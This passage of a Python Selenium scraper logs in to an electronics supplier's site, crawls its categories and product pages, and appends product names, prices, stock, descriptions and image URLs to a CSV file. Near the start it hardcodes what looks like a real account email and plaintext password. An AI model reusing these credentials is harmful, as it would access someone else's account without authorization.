logging.getLogger('urllib3.connectionpool').addHandler(fh)\n logging.getLogger().addHandler(fh)\n self.loggger = logging.getLogger()\n self.driver.get(response.url)\n list1 = []\n list2 = []\n list3 = []\n list4 = []\n list5 = []\n list3_categories = []\n list4_categories = []\n csv_categories1 = ''\n csv_heading = ''\n csv_stock = ''\n csv_price_new = ''\n csv_price_old = ''\n csv_desc = ''\n csv_article_number = ''\n csv_image_url = []\n old_product_url = []\n WebDriverWait(self.driver, 20).until(EC.presence_of_element_located\n ((By.ID, 'email')))\n username = self.driver.find_element_by_id('email')\n username.send_keys('info@themobilestore.se')\n username = self.driver.find_element_by_id('password')\n username.send_keys('order88')\n login = self.driver.find_element_by_class_name('button-confirm')\n login.click()\n time.sleep(5)\n fh, abs_path = mkstemp()\n with fdopen(fh, 'w') as new_file:\n with open('tekniknet.csv') as old_file:\n for line in old_file:\n new_file.write(line.replace('NEW', 'old'))\n remove('tekniknet.csv')\n move(abs_path, 'tekniknet.csv')\n with open('tekniknet.csv', 'r') as ins:\n for line in ins:\n old_product_url.append(line.split(',')[-1])\n file = open('tekniknet.csv', 'a', errors='replace')\n for wrapper1 in self.driver.find_elements_by_class_name('level-0'):\n child_wrapper1 = wrapper1.find_element_by_xpath('./a')\n link1 = child_wrapper1.get_attribute('href')\n list1.append(link1)\n self.loggger.info(\n '*************************************************')\n self.loggger.info(link1)\n for i in range(0, len(list1) - 4):\n self.driver.get(list1[i])\n try:\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.CLASS_NAME, 'inner')))\n for wrapper2 in self.driver.find_elements_by_class_name('inner'\n ):\n try:\n sub2 = wrapper2.find_element_by_class_name('subLinks')\n child_wrapper2 = sub2.find_elements_by_xpath('.//a')\n for child2 in child_wrapper2:\n link2 = child2.get_attribute('href')\n list2.append(link2)\n self.loggger.info(\n '^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^'\n )\n self.loggger.info(link2)\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error')\n except:\n try:\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.ID,\n 'categorySubCategories')))\n subcategory = self.driver.find_element_by_id(\n 'categorySubCategories')\n wrapper2_1 = subcategory.find_elements_by_xpath('.//a')\n for child3 in wrapper2_1:\n link2_1 = child3.get_attribute('href')\n list5.append(link2_1)\n for n in range(0, len(list5)):\n self.driver.get(list5[n])\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.ID,\n 'categorySubCategories')))\n subcategory = self.driver.find_element_by_id(\n 'categorySubCategories')\n wrapper2_1_1 = subcategory.find_elements_by_xpath(\n './/a')\n for child3_1 in wrapper2_1_1:\n if child3_1.text != 'Visa alla':\n link2_1_1 = child3_1.get_attribute('href')\n list2.append(link2_1_1)\n except:\n try:\n breadcrumbs2 = self.driver.find_element_by_id(\n 'breadcrumbs')\n categories2 = breadcrumbs2.find_elements_by_xpath(\n './/li')\n csv_categories2 = ''\n for category2 in categories2:\n csv_categories2 = (csv_categories2 + category2.\n text + '/')\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.CLASS_NAME,\n 'listProduct')))\n for wrapper2_2 in self.driver.find_elements_by_class_name(\n 'listProduct'):\n wrapper2_3 = wrapper2_2.find_element_by_xpath(\n './/a')\n link2_2 = wrapper2_3.get_attribute('href')\n list4.append(link2_2)\n list4_categories.append(csv_categories2)\n self.loggger.info(\n '&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'\n )\n self.loggger.info(link2_2)\n self.loggger.info('error')\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error')\n for j in range(0, len(list2)):\n try:\n self.loggger.info('**********-------------- ' + str(j) +\n ' ******************************')\n self.driver.get(list2[j])\n WebDriverWait(self.driver, 30).until(EC.\n presence_of_element_located((By.ID, 'breadcrumbs')))\n breadcrumbs1 = self.driver.find_element_by_id('breadcrumbs')\n categories1 = breadcrumbs1.find_elements_by_xpath('.//li')\n csv_categories1 = ''\n for category1 in categories1:\n csv_categories1 = csv_categories1 + category1.text + '/'\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.CLASS_NAME, 'listProduct'))\n )\n for wrapper3 in self.driver.find_elements_by_class_name(\n 'listProduct'):\n child_wrapper3 = wrapper3.find_element_by_xpath('.//a')\n link3 = child_wrapper3.get_attribute('href')\n list3.append(link3)\n list3_categories.append(csv_categories1)\n self.loggger.info(\n '&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'\n )\n self.loggger.info(link3)\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error')\n for k in range(0, len(list3)):\n try:\n if list3[k] not in old_product_url:\n self.loggger.info('----------------------- ' + str\n (k) + ' ******************************')\n self.driver.get(list3[k])\n WebDriverWait(self.driver, 30).until(EC.\n presence_of_element_located((By.ID, 'breadcrumbs')))\n offer = self.driver.find_element_by_id('productPageUpper')\n try:\n heading = offer.find_element_by_class_name('pHeader')\n csv_heading = heading.text.replace(',', '.')\n except:\n self.loggger.info('heading3 non-exist')\n csv_heading = ''\n try:\n stock = offer.find_element_by_class_name('instock')\n csv_stock = stock.text\n except:\n csv_stock = 'Out of stock'\n self.loggger.info('stock3 non-exist')\n csv_stock = ''\n try:\n price_new = offer.find_element_by_class_name(\n 'priceRegular')\n csv_price_new = price_new.text.split(' ')[0]\n except:\n try:\n price_new = offer.find_element_by_class_name(\n 'priceNew')\n csv_price_new = price_new.text.split(' ')[0]\n price_old = offer.find_element_by_class_name(\n 'priceOld')\n csv_price_old = price_old.text.split(' ')[0]\n except:\n self.loggger.info('price3 non-exist')\n csv_price_old = ''\n csv_price_new = ''\n try:\n desc = offer.find_element_by_id('pDesc')\n csv_desc = desc.get_attribute('innerHTML').replace(',',\n '-').replace('\\n', ' ').replace('\\r', '').rstrip(\n ).lstrip()\n except:\n self.loggger.info('description3 non-exist')\n csv_desc = ''\n try:\n article_number = offer.find_element_by_id(\n 'pManufacturer')\n csv_article_number = article_number.text.split(' ')[-1\n ].replace(',', '.')\n except:\n self.loggger.info('article number3 non-exist')\n csv_article_number = ''\n try:\n pimages = offer.find_elements_by_xpath('.//img')\n csv_image_url = []\n for pimage in pimages:\n image_url = pimage.get_attribute('src')\n if image_url not in csv_image_url:\n csv_image_url.append(image_url)\n except:\n self.loggger.info('image3 non-exist')\n if len(csv_image_url) == 1:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 2:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 3:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3\n [k] + '\\n')\n elif len(csv_image_url) == 4:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +\n ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 5:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 6:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 7:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3\n [k] + '\\n')\n elif len(csv_image_url) == 8:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +\n ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 9:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 10:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 11:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3\n [k] + '\\n')\n elif len(csv_image_url) == 12:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +\n ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 13:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + ' ' + ',' + ' ' +\n ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +\n ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 14:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3\n [k] + '\\n')\n elif len(csv_image_url) == 15:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +\n ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 16:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' +\n csv_image_url[15] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 17:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' +\n csv_image_url[15] + ',' + csv_image_url[16] +\n ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' +\n list3[k] + '\\n')\n elif len(csv_image_url) >= 18:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' +\n csv_image_url[15] + ',' + csv_image_url[16] +\n ',' + csv_image_url[17] + ',' + ' ' + ',' +\n csv_stock + ',' + list3[k] + '\\n')\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error3')\n for m in range(0, len(list4)):\n try:\n if list4[m] not in old_product_url:\n self.loggger.info('********************** ' + str(\n k) + ' ******************************')\n self.driver.get(list4[m])\n WebDriverWait(self.driver, 30).until(EC.\n presence_of_element_located((By.ID, 'breadcrumbs')))\n offer = self.driver.find_element_by_id('productPageUpper')\n try:\n heading = offer.find_element_by_class_name('pHeader')\n csv_heading = heading.text.replace(',', '.')\n except:\n self.loggger.info('heading4 non-exist')\n csv_heading = ''\n try:\n stock = offer.find_element_by_class_name('instock')\n csv_stock = stock.text\n except:\n csv_stock = 'Out of stock'\n self.loggger.info('stock4 non-exist')\n try:\n price_new = offer.find_element_by_class_name(\n 'priceRegular')\n csv_price_new = price_new.text.split(' ')[0]\n except:\n try:\n price_new = offer.find_element_by_class_name(\n 'priceNew')\n csv_price_new = price_new.text.split(' ')[0]\n price_old = offer.find_element_by_class_name(\n 'priceOld')\n csv_price_old = price_old.text.split(' ')[0]\n except:\n self.loggger.info('price4 non-exist')\n csv_price_new = ''\n csv_price_old = ''\n try:\n desc = offer.find_element_by_id('pDesc')\n csv_desc = desc.get_attribute('innerHTML').replace(',',\n '-').replace('\\n', ' ').replace('\\r', '').rstrip(\n ).lstrip()\n except:\n self.loggger.info('description4 non-exist')\n csv_desc = ''\n try:\n article_number = offer.find_element_by_id(\n 'pManufacturer')\n csv_article_number = article_number.text.split(' ')[-1\n ].replace(',', '.')\n except:\n self.loggger.info('article number4 non-exist')\n csv_article_number = ''\n try:\n pimages = offer.find_elements_by_xpath('.//img')\n csv_image_url = []\n for pimage in pimages:\n image_url = pimage.get_attribute('src')\n if image_url not in csv_image_url:\n csv_image_url.append(image_url)\n except:\n self.loggger.info('image4 non-exist')\n if len(csv_image_url) == 1:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 2:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 3:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4\n [m] + '\\n')\n elif len(csv_image_url) == 4:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +\n ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 5:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 6:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 7:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4\n [m] + '\\n')\n elif len(csv_image_url) == 8:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +\n ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 9:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' 